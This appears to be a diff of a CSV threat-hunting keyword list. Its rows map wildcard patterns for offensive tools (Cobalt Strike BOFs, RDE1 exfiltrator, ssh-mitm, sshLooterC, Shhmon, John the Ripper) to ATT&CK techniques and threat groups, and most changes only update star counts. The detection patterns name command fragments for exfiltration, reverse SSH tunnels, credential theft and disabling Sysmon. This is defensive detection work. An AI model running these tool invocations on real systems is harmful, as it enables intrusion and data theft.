APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_start/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/ShellGhost.c*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*src/Remote/chromeKey/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/lastpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_config/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_create/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_delete/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_start/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/ShellGhost.c*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*Src/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" -"*src/tests/NESSIE/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/tests/NESSIE/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*src/zerologon.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*src\unhook.c*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*src\unhook.c*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" -"*srde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*srde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*srde_release dns -k *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*srde_release https -i *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release dns -k *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release https -i *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srvsvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*ss -tunlp || netstat -tunlp*127.0.0.1*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*ss -tunlp || netstat -tunlp*127.0.0.1*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*ssf.exe -D * -p * 127.0.0.1*","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration 
purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssfd.exe -p *","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssh -N -R 4567:localhost:*root*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" -"*ssh2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ssh2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ssh2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ssh2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*sshame*","offensive_tool_keyword","sshame","tool to brute force SSH public-key 
authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","N/A","N/A","1","65","15","2023-04-17T12:44:57Z","2019-08-25T16:50:56Z" -"*ssh-auditor*","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","582","88","2023-02-25T01:34:02Z","2016-11-08T22:47:38Z" +"*ssh-auditor*","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","582","87","2023-02-25T01:34:02Z","2016-11-08T22:47:38Z" "*sshbrute.py*","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" "*SSHBruteForce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
-"*sshkey_persistence.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*sshkey_persistence.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*sshLooterC*","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","3","246","72","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z" -"*ssh-mitm*","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1548","211","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" +"*ssh-mitm*","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1548","210","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" "*sshmon*hunt*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" 
